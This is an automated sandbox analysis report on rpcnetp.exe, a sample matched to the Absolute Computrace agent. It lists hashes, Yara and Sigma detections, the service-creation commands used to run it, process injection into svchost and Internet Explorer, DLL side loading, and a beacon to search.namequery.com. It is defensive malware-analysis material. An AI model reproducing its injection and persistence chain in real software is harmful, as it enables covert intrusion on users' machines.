
Windows Analysis Report rpcnetp.exe

Overview

General Information

Sample Name: rpcnetp.exe
Analysis ID: 499091
MD5: 57bd3200910a8d2c85b1927b27123a6b
SHA1: bd08ae784aa0ed5428347c861ebeb71554af217f
SHA256: f5157e5b8afe1f79f29c947449477d13ede3d7341699256e62966474a7ee1eb5

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
DLL side loading technique detected
Sigma detected: Suspicious Svchost Process
Injects files into Windows application
Writes to foreign memory regions
Creates a thread in another existing process (thread injection)
Allocates memory in foreign processes
Uses 32bit PE files
Yara signature match
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Drops PE files
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)

Classification

Classification chart categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious.
  • System is w10x64
  • cmd.exe (PID: 6932 cmdline: cmd /c sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' >> C:\servicereg.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6984 cmdline: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • cmd.exe (PID: 7016 cmdline: cmd /c sc start EcVoz >> C:\servicestart.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 7056 cmdline: sc start EcVoz MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • rpcnetp.exe (PID: 7072 cmdline: C:\Users\user\Desktop\rpcnetp.exe MD5: 57BD3200910A8D2C85B1927B27123A6B)
    • svchost.exe (PID: 7116 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • iexplore.exe (PID: 7148 cmdline: C:\Program Files (x86)\Internet Explorer\iexplore.exe MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • svchost.exe (PID: 6480 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found
Source: rpcnetp.exe; Rule: PUP_ComputraceAgent; Description: Absolute Computrace Agent Executable; Author: ASERT - Arbor Networks (slightly modified by Florian Roth); Strings:
  • 0x42fd:$a: D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04
  • 0x4fc2:$b1: 72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00
  • 0x64c:$b2: 54 61 67 49 64 00
Source: C:\Users\user\Desktop\rpcnetp.dll; Rule: PUP_ComputraceAgent; Description: Absolute Computrace Agent Executable; Author: ASERT - Arbor Networks (slightly modified by Florian Roth); Strings:
  • 0x42fd:$a: D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04
  • 0x4fc2:$b1: 72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00
  • 0x64c:$b2: 54 61 67 49 64 00

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process
Source: Process started; Author: Florian Roth; Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\Desktop\rpcnetp.exe, ParentImage: C:\Users\user\Desktop\rpcnetp.exe, ParentProcessId: 7072, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 7116
Sigma detected: New Service Creation
Source: Process started; Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community; Data: Command: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' , CommandLine: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: cmd /c sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' >> C:\servicereg.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6932, ProcessCommandLine: sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' , ProcessId: 6984
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started; Author: vburov; Data: Command: C:\Windows\system32\svchost.exe, CommandLine: C:\Windows\system32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\Desktop\rpcnetp.exe, ParentImage: C:\Users\user\Desktop\rpcnetp.exe, ParentProcessId: 7072, ProcessCommandLine: C:\Windows\system32\svchost.exe, ProcessId: 7116

Jbx Signature Overview


AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\Desktop\rpcnetp.dll; Virustotal: Detection: 7%
Source: rpcnetp.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: rpcnetp.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: iexplore.exe, 00000008.00000000.695874570.0000000003F0C000.00000004.00000010.sdmp; String found in binary or memory: http://search.namequery.com/
Source: unknown; HTTP traffic detected:
  POST / HTTP/1.1
  TagId: 0
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;)
  Host: search.namequery.com
  Content-Length: 0
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown; DNS traffic detected: queries for: search.namequery.com

System Summary:

Source: rpcnetp.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Matched rule: PUP_ComputraceAgent (date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/) in the following sources:
  • rpcnetp.exe (type: SAMPLE)
  • the following unpacked PE images (type: UNPACKEDPE):
    • 7.0.svchost.exe.72b20000.62.unpack
    • 7.0.svchost.exe.72b20000.58.unpack
    • 7.0.svchost.exe.72b20000.0.unpack
    • 7.0.svchost.exe.72b20000.31.unpack
    • 7.0.svchost.exe.72b20000.4.unpack
    • 8.0.iexplore.exe.72b20000.16.unpack
    • 8.0.iexplore.exe.72b20000.13.unpack
    • 8.0.iexplore.exe.72b20000.8.unpack
    • 7.0.svchost.exe.72b20000.66.unpack
    • 7.0.svchost.exe.72b20000.43.unpack
    • 7.0.svchost.exe.72b20000.67.unpack
    • 7.0.svchost.exe.72b20000.13.unpack
    • 6.2.rpcnetp.exe.72b20000.1.unpack
    • 6.0.rpcnetp.exe.a10000.0.unpack
    • 7.0.svchost.exe.72b20000.40.unpack
    • 7.2.svchost.exe.72b20000.0.unpack
    • 7.0.svchost.exe.72b20000.28.unpack
    • 7.0.svchost.exe.72b20000.6.unpack
    • 8.0.iexplore.exe.72b20000.14.unpack
    • 7.0.svchost.exe.72b20000.63.unpack
    • 8.0.iexplore.exe.72b20000.11.unpack
    • 7.0.svchost.exe.72b20000.54.unpack
    • 7.0.svchost.exe.72b20000.50.unpack
    • 7.0.svchost.exe.72b20000.14.unpack
    • 7.0.svchost.exe.72b20000.12.unpack
    • 8.0.iexplore.exe.72b20000.19.unpack
    • 8.0.iexplore.exe.72b20000.18.unpack
    • 7.0.svchost.exe.72b20000.46.unpack
    • 8.0.iexplore.exe.72b20000.21.unpack
    • 7.0.svchost.exe.72b20000.21.unpack
    • 7.0.svchost.exe.72b20000.65.unpack
    • 8.0.iexplore.exe.72b20000.29.unpack
    • 7.0.svchost.exe.72b20000.75.unpack
    • 7.0.svchost.exe.72b20000.72.unpack
    • 8.0.iexplore.exe.72b20000.4.unpack
    • 8.0.iexplore.exe.72b20000.26.unpack
    • 8.0.iexplore.exe.72b20000.20.unpack
    • 8.2.iexplore.exe.72b20000.0.unpack
    • 7.0.svchost.exe.72b20000.5.unpack
    • 7.0.svchost.exe.72b20000.76.unpack
    • 7.0.svchost.exe.72b20000.19.unpack
    • 7.0.svchost.exe.72b20000.71.unpack
    • 7.0.svchost.exe.72b20000.47.unpack
    • 7.0.svchost.exe.72b20000.51.unpack
    • 7.0.svchost.exe.72b20000.29.unpack
    • 8.0.iexplore.exe.72b20000.17.unpack
    • 7.0.svchost.exe.72b20000.35.unpack
    • 6.2.rpcnetp.exe.a10000.0.unpack
    • 7.0.svchost.exe.72b20000.52.unpack
    • 8.0.iexplore.exe.72b20000.27.unpack
    • 7.0.svchost.exe.72b20000.45.unpack
    • 7.0.svchost.exe.72b20000.77.unpack
    • 7.0.svchost.exe.72b20000.27.unpack
    • 7.0.svchost.exe.72b20000.3.unpack
    • 7.0.svchost.exe.72b20000.18.unpack
    • 7.0.svchost.exe.72b20000.22.unpack
    • 7.0.svchost.exe.72b20000.36.unpack
    • 7.0.svchost.exe.72b20000.81.unpack
    • 8.0.iexplore.exe.72b20000.7.unpack
    • 7.0.svchost.exe.72b20000.38.unpack
    • 7.0.svchost.exe.72b20000.24.unpack
    • 7.0.svchost.exe.72b20000.37.unpack
    • 7.0.svchost.exe.72b20000.26.unpack
    • 7.0.svchost.exe.72b20000.23.unpack
    • 7.0.svchost.exe.72b20000.49.unpack
    • 8.0.iexplore.exe.72b20000.24.unpack
    • 7.0.svchost.exe.72b20000.1.unpack
    • 7.0.svchost.exe.72b20000.70.unpack
    • 7.0.svchost.exe.72b20000.80.unpack
    • 7.0.svchost.exe.72b20000.7.unpack
    • 8.0.iexplore.exe.72b20000.28.unpack
    • 7.0.svchost.exe.72b20000.34.unpack
    • 8.0.iexplore.exe.72b20000.23.unpack
    • 8.0.iexplore.exe.72b20000.30.unpack
    • 7.0.svchost.exe.72b20000.56.unpack
    • 7.0.svchost.exe.72b20000.41.unpack
    • 7.0.svchost.exe.72b20000.32.unpack
    • 8.0.iexplore.exe.72b20000.5.unpack
    • 7.0.svchost.exe.72b20000.53.unpack
    • 7.0.svchost.exe.72b20000.55.unpack
    • 8.0.iexplore.exe.72b20000.3.unpack
    • 7.0.svchost.exe.72b20000.61.unpack
    • 8.0.iexplore.exe.72b20000.0.unpack
    • 7.0.svchost.exe.72b20000.30.unpack
    • 7.0.svchost.exe.72b20000.79.unpack
    • 7.0.svchost.exe.72b20000.25.unpack
    • 8.0.iexplore.exe.72b20000.22.unpack
    • 8.0.iexplore.exe.72b20000.1.unpack
    • 7.0.svchost.exe.72b20000.39.unpack
    • 8.0.iexplore.exe.72b20000.2.unpack
Source: 7.0.svchost.exe.72b20000.11.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.57.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.73.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.68.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.44.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.25.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.9.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.78.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.15.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.20.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.60.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.74.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.59.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.69.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.8.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.9.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.6.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.16.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.12.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.64.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.17.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.2.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.15.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.48.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.42.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.33.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 8.0.iexplore.exe.72b20000.10.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: 7.0.svchost.exe.72b20000.10.unpack, type: UNPACKEDPEMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: C:\Users\user\Desktop\rpcnetp.dll, type: DROPPEDMatched rule: PUP_ComputraceAgent date = 2018-05-01, author = ASERT - Arbor Networks (slightly modified by Florian Roth), description = Absolute Computrace Agent Executable, reference = https://asert.arbornetworks.com/lojack-becomes-a-double-agent/
Source: C:\Users\user\Desktop\rpcnetp.exe, Code function: 6_2_00A12ADB GetCurrentProcessId,OpenProcess,DuplicateTokenEx,SetTokenInformation,CreateEnvironmentBlock,CreateProcessAsUserA,CloseHandle,CreateProcessA,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,ResumeThread,CreateThread, 6_2_00A12ADB
Source: C:\Users\user\Desktop\rpcnetp.exe, File read: C:\Users\user\Desktop\rpcnetp.exe
Source: C:\Users\user\Desktop\rpcnetp.exe, Code function: 6_2_00A11EDA StartServiceCtrlDispatcherA, 6_2_00A11EDA
Source: C:\Users\user\Desktop\rpcnetp.exe, Code function: 6_2_72B21EDA StartServiceCtrlDispatcherA, 6_2_72B21EDA
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, Code function: 8_2_72B21EDA StartServiceCtrlDispatcherA, 8_2_72B21EDA
Source: rpcnetp.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\sc.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\rpcnetp.exe, Code function: 6_2_00A11EDA StartServiceCtrlDispatcherA, 6_2_00A11EDA
Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe cmd /c sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' >> C:\servicereg.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\sc.exe sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe'
Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe cmd /c sc start EcVoz >> C:\servicestart.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\sc.exe sc start EcVoz
Source: unknown, Process created: C:\Users\user\Desktop\rpcnetp.exe C:\Users\user\Desktop\rpcnetp.exe
Source: C:\Users\user\Desktop\rpcnetp.exe, Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
Source: unknown, Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\sc.exe sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe'
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\sc.exe sc start EcVoz
Source: C:\Users\user\Desktop\rpcnetp.exe, Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6952:120:WilError_01
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_01
Source: C:\Users\user\Desktop\rpcnetp.exe, File created: C:\Users\user\Desktop\rpcnetp.dll
Source: classification engine, Classification label: mal72.evad.winEXE@14/5@1/1
Source: rpcnetp.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\rpcnetp.exe, Code function: 6_2_00A1159C push ecx; ret 6_2_00A115AC
Source: C:\Users\user\Desktop\rpcnetp.exe, Code function: 6_2_72B2159C push ecx; ret 6_2_72B215AC
Source: rpcnetp.exe, Static PE information: section name: .cdata
Source: rpcnetp.dll.6.dr, Static PE information: section name: .cdata
Source: C:\Users\user\Desktop\rpcnetp.exe, Code function: 6_2_00A12123 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree, 6_2_00A12123
Source: C:\Users\user\Desktop\rpcnetp.exe, File created: C:\Users\user\Desktop\rpcnetp.dll
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\sc.exe sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe'
Source: C:\Users\user\Desktop\rpcnetp.exe, Code function: 6_2_00A11EDA StartServiceCtrlDispatcherA, 6_2_00A11EDA
Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe, Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\rpcnetp.exe, API call chain: ExitProcess graph end node graph_6-3452
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, API call chain: ExitProcess graph end node graph_8-1679
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, API call chain: ExitProcess graph end node graph_8-2135
Source: C:\Users\user\Desktop\rpcnetp.exe, Code function: 6_2_00A12123 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree, 6_2_00A12123

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exe, Section loaded: C:\Users\user\Desktop\rpcnetp.dll
Injects files into Windows application
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, Injected file: C:\Users\user\Desktop\rpcnetp.dll was created by C:\Users\user\Desktop\rpcnetp.exe
Writes to foreign memory regions
Source: C:\Users\user\Desktop\rpcnetp.exe, Memory written: C:\Windows\SysWOW64\svchost.exe base: 620000
Source: C:\Users\user\Desktop\rpcnetp.exe, Memory written: C:\Windows\SysWOW64\svchost.exe base: 72B260C8
Source: C:\Windows\SysWOW64\svchost.exe, Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: E30000
Source: C:\Windows\SysWOW64\svchost.exe, Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 72B260C8
Source: C:\Windows\SysWOW64\svchost.exe, Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 30F719C
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\rpcnetp.exe, Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 73B757B0
Source: C:\Users\user\Desktop\rpcnetp.exe, Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 72B232DE
Source: C:\Windows\SysWOW64\svchost.exe, Thread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 73B757B0
Source: C:\Windows\SysWOW64\svchost.exe, Thread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B232DE
Source: C:\Windows\SysWOW64\svchost.exe, Thread created: C:\Program Files (x86)\Internet Explorer\iexplore.exe EIP: 72B22314
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, Thread created: unknown EIP: 72B21C7B
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, Thread created: unknown EIP: 72B22314
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\rpcnetp.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 620000 protect: page read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: E30000 protect: page read and writeJump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree, explorer.exe6_2_00A12123
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree, explorer.exe6_2_72B22123
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalFree,OpenProcess,OpenProcessToken,CloseHandle,FreeLibrary,LocalFree, explorer.exe8_2_72B22123
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start EcVoz Jump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\Desktop\rpcnetp.exeCode function: 6_2_00A132DE GetVersion,GetStdHandle,CloseHandle,CloseHandle,SetStdHandle,CreateEventA,CreateThread,WaitForSingleObject,WaitForSingleObject,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,ExitProcess,6_2_00A132DE
